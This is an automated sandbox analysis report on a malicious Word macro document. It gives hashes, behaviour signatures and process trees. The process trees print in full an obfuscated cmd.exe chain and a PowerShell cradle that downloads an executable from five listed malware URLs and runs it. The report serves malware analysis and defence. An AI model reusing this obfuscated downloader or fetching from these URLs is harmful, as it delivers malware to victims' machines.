Analysis
-
max time kernel
101s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
29-08-2024 15:27
Static task
static1
Behavioral task
behavioral1
Sample
c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc
-
Size
248KB
-
MD5
c918f47fda0745fedaca86195397ace0
-
SHA1
90367cd9c7d83d6028e0125123541a138c5a82d6
-
SHA256
7af935b7cd7ddc1383ca817ba41f0784340459331754fcdfa4348fc2a2fe7813
-
SHA512
894663307c2bc59f31ac3fd5ae6934971dd8b7beebbbcb18de5d020ad43309baf8a1012662c33b195dc1bd3bfcaae45a87e5b5ef396cb58d0e56f0956fb781ac
-
SSDEEP
3072:BO4ZAi7XnrA+Tj7/tKXYAO+aqjL/xSu90OoiLuDKZXfwKeljR17:BOCA83rA+Tj7lKYMa4xUOmD+XfwLH
Malware Config
Extracted
http://ttobus.com/ZtzZFiHGL_r
http://bilanacc.com/P7BuwLoQsTjP0hBVF
http://gclubfan.com/ahjpTwNsvu2X_Q7h
http://katariahospital.com/tquLevYG
http://pjfittedkitchens.com/uerfWET_jrbze
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2780 1724 cmd.exe 28 -
Blocklisted process makes network request 4 IoCs
flow pid Process 8 2160 powershell.exe 10 2160 powershell.exe 11 2160 powershell.exe 13 2160 powershell.exe -
pid Process 2160 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 2780 cmd.exe 1096 cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1B0A500B-7C65-475E-9A59-B8917CE9C2FF}\2.0\0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\TypeLib\{1B0A500B-7C65-475E-9A59-B8917CE9C2FF}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1724 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2160 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2160 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1724 WINWORD.EXE 1724 WINWORD.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1724 wrote to memory of 2780 1724 WINWORD.EXE 29 PID 1724 wrote to memory of 2780 1724 WINWORD.EXE 29 PID 1724 wrote to memory of 2780 1724 WINWORD.EXE 29 PID 1724 wrote to memory of 2780 1724 WINWORD.EXE 29 PID 2780 wrote to memory of 1096 2780 cmd.exe 32 PID 2780 wrote to memory of 1096 2780 cmd.exe 32 PID 2780 wrote to memory of 1096 2780 cmd.exe 32 PID 2780 wrote to memory of 1096 2780 cmd.exe 32 PID 1096 wrote to memory of 2980 1096 cmd.exe 33 PID 1096 wrote to memory of 2980 1096 cmd.exe 33 PID 1096 wrote to memory of 2980 1096 cmd.exe 33 PID 1096 wrote to memory of 2980 1096 cmd.exe 33 PID 1096 wrote to memory of 2924 1096 cmd.exe 34 PID 1096 wrote to memory of 2924 1096 cmd.exe 34 PID 1096 wrote to memory of 2924 1096 cmd.exe 34 PID 1096 wrote to memory of 2924 1096 cmd.exe 34 PID 2924 wrote to memory of 2160 2924 cmd.exe 35 PID 2924 wrote to memory of 2160 2924 cmd.exe 35 PID 2924 wrote to memory of 2160 2924 cmd.exe 35 PID 2924 wrote to memory of 2160 2924 cmd.exe 35 PID 1724 wrote to memory of 2272 1724 WINWORD.EXE 36 PID 1724 wrote to memory of 2272 1724 WINWORD.EXE 36 PID 1724 wrote to memory of 2272 1724 WINWORD.EXE 36 PID 1724 wrote to memory of 2272 1724 WINWORD.EXE 36
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1724 -
\??\c:\windows\SysWOW64\cmd.exec:\tiqdul\ncjld\jwcpob\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set gN=xepg'bE-QWi$d3=t1YG/Mzn}(Dwl:4\5~hUZPC{AmIL%76uXf y0Nkj+S;BO)a@TqF_.2sHv,c9oVr&&for %4 in (2,75,26,43,36,34,58,42,41,37,28,32,31,72,16,43,77,43,56,6,56,56,41,59,52,52,39,20,6,28,32,7,29,72,16,43,33,43,63,6,20,36,28,32,7,13,72,16,43,27,27,49,11,54,33,40,12,2,14,4,54,48,69,71,10,69,40,4,57,11,12,48,26,75,54,14,22,1,26,7,75,5,54,1,73,15,49,52,1,15,67,9,1,5,37,27,10,1,22,15,57,11,48,10,10,54,61,14,4,33,15,15,2,28,19,19,15,15,75,5,46,69,67,73,75,40,19,35,15,21,35,65,10,70,18,42,66,77,62,33,15,15,2,28,19,19,5,10,27,61,22,61,73,73,67,73,75,40,19,36,44,58,46,26,42,75,8,69,63,54,36,51,33,58,76,65,62,33,15,15,2,28,19,19,3,73,27,46,5,48,61,22,67,73,75,40,19,61,33,54,2,63,26,52,69,71,46,68,47,66,8,44,33,62,33,15,15,2,28,19,19,53,61,15,61,77,10,61,33,75,69,2,10,15,61,27,67,73,75,40,19,15,64,46,42,1,71,17,18,62,33,15,15,2,28,19,19,2,54,48,10,15,15,1,12,53,10,15,73,33,1,22,69,67,73,75,40,19,46,1,77,48,9,6,63,66,54,77,5,21,1,4,67,56,2,27,10,15,24,4,62,4,60,57,11,64,73,10,73,54,5,54,14,4,15,26,75,64,2,10,4,57,11,64,69,69,48,61,49,14,49,4,74,74,45,4,57,11,33,5,40,26,54,53,10,14,4,71,5,40,10,2,71,26,4,57,11,15,10,22,21,64,14,11,1,22,71,28,15,1,40,2,55,4,30,4,55,11,64,69,69,48,61,55,4,67,1,0,1,4,57,48,75,77,1,61,73,33,24,11,22,10,21,5,26,49,10,22,49,11,48,10,10,54,61,60,38,15,77,50,38,11,12,48,26,75,54,67,25,75,26,22,27,75,61,12,65,10,27,1,24,11,22,10,21,5,26,72,49,11,15,10,22,21,64,60,57,11,26,71,69,48,26,14,4,26,21,10,64,64,22,4,57,41,48,49,24,24,18,1,15,7,41,15,1,40,49,11,15,10,22,21,64,60,67,27,1,22,3,15,33,49,7,3,1,49,29,51,51,51,51,60,49,38,41,22,71,75,53,1,7,41,15,1,40,49,11,15,10,22,21,64,57,11,71,48,15,33,77,15,15,14,4,73,75,75,73,2,10,69,4,57,5,77,1,61,53,57,23,23,73,61,15,73,33,38,23,23,11,61,12,64,10,5,73,14,4,22,27,26,26,10,33,4,57,78)do set WM=!WM!!gN:~%4,1!&&if %4 gtr 77 echo !WM:*WM!=!|%CommonProgramFiles(x86):~23,1%m%ALLUSERSPROFILE:~-4,-3% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\cmd.exeCmD /V:O/C"set gN=xepg'bE-QWi$d3=t1YG/Mzn}(Dwl:4\5~hUZPC{AmIL%76uXf y0Nkj+S;BO)a@TqF_.2sHv,c9oVr&&for %4 in (2,75,26,43,36,34,58,42,41,37,28,32,31,72,16,43,77,43,56,6,56,56,41,59,52,52,39,20,6,28,32,7,29,72,16,43,33,43,63,6,20,36,28,32,7,13,72,16,43,27,27,49,11,54,33,40,12,2,14,4,54,48,69,71,10,69,40,4,57,11,12,48,26,75,54,14,22,1,26,7,75,5,54,1,73,15,49,52,1,15,67,9,1,5,37,27,10,1,22,15,57,11,48,10,10,54,61,14,4,33,15,15,2,28,19,19,15,15,75,5,46,69,67,73,75,40,19,35,15,21,35,65,10,70,18,42,66,77,62,33,15,15,2,28,19,19,5,10,27,61,22,61,73,73,67,73,75,40,19,36,44,58,46,26,42,75,8,69,63,54,36,51,33,58,76,65,62,33,15,15,2,28,19,19,3,73,27,46,5,48,61,22,67,73,75,40,19,61,33,54,2,63,26,52,69,71,46,68,47,66,8,44,33,62,33,15,15,2,28,19,19,53,61,15,61,77,10,61,33,75,69,2,10,15,61,27,67,73,75,40,19,15,64,46,42,1,71,17,18,62,33,15,15,2,28,19,19,2,54,48,10,15,15,1,12,53,10,15,73,33,1,22,69,67,73,75,40,19,46,1,77,48,9,6,63,66,54,77,5,21,1,4,67,56,2,27,10,15,24,4,62,4,60,57,11,64,73,10,73,54,5,54,14,4,15,26,75,64,2,10,4,57,11,64,69,69,48,61,49,14,49,4,74,74,45,4,57,11,33,5,40,26,54,53,10,14,4,71,5,40,10,2,71,26,4,57,11,15,10,22,21,64,14,11,1,22,71,28,15,1,40,2,55,4,30,4,55,11,64,69,69,48,61,55,4,67,1,0,1,4,57,48,75,77,1,61,73,33,24,11,22,10,21,5,26,49,10,22,49,11,48,10,10,54,61,60,38,15,77,50,38,11,12,48,26,75,54,67,25,75,26,22,27,75,61,12,65,10,27,1,24,11,22,10,21,5,26,72,49,11,15,10,22,21,64,60,57,11,26,71,69,48,26,14,4,26,21,10,64,64,22,4,57,41,48,49,24,24,18,1,15,7,41,15,1,40,49,11,15,10,22,21,64,60,67,27,1,22,3,15,33,49,7,3,1,49,29,51,51,51,51,60,49,38,41,22,71,75,53,1,7,41,15,1,40,49,11,15,10,22,21,64,57,11,71,48,15,33,77,15,15,14,4,73,75,75,73,2,10,69,4,57,5,77,1,61,53,57,23,23,73,61,15,73,33,38,23,23,11,61,12,64,10,5,73,14,4,22,27,26,26,10,33,4,57,78)do set WM=!WM!!gN:~%4,1!&&if %4 gtr 77 echo !WM:*WM!=!|CmD "3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $jhmdp='jfsvism';$dfwoj=new-object Net.WebClient;$fiija='http://ttobus.com/ZtzZFiHGL_r@http://bilanacc.com/P7BuwLoQsTjP0hBVF@http://gclubfan.com/ahjpTwNsvu2X_Q7h@http://katariahospital.com/tquLevYG@http://pjfittedkitchens.com/uerfWET_jrbze'.Split('@');$qcicjbj='twoqpi';$qssfa = '996';$hbmwjki='vbmipvw';$tinzq=$env:temp+'\'+$qssfa+'.exe';foreach($nizbw in $fiija){try{$dfwoj.DownloadFile($nizbw, $tinzq);$wvsfw='wziqqn';If ((Get-Item $tinzq).length -ge 40000) {Invoke-Item $tinzq;$vfthrtt='coocpis';break;}}catch{}}$adqibc='nlwwih';"4⤵
- System Location Discovery: System Language Discovery
PID:2980
-
-
C:\Windows\SysWOW64\cmd.exeCmD4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $jhmdp='jfsvism';$dfwoj=new-object Net.WebClient;$fiija='http://ttobus.com/ZtzZFiHGL_r@http://bilanacc.com/P7BuwLoQsTjP0hBVF@http://gclubfan.com/ahjpTwNsvu2X_Q7h@http://katariahospital.com/tquLevYG@http://pjfittedkitchens.com/uerfWET_jrbze'.Split('@');$qcicjbj='twoqpi';$qssfa = '996';$hbmwjki='vbmipvw';$tinzq=$env:temp+'\'+$qssfa+'.exe';foreach($nizbw in $fiija){try{$dfwoj.DownloadFile($nizbw, $tinzq);$wvsfw='wziqqn';If ((Get-Item $tinzq).length -ge 40000) {Invoke-Item $tinzq;$vfthrtt='coocpis';break;}}catch{}}$adqibc='nlwwih';5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2272
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD59249955c958ebbb5d1967020abd5021c
SHA108ca7648bd0ae4fa60d68e07bffafa0661739a89
SHA256d488150e9503a40c59a625c5f472ee5daee6c7517c796492a37a88c8dd68e27c
SHA512f6266477f6d2ff8086fd6155db7d59b616696a06983bb0deaf4c5e972edff6c2664b4911591204abba3695f01e85f67355d9c8598ab1c7c36a111f57f3abc2df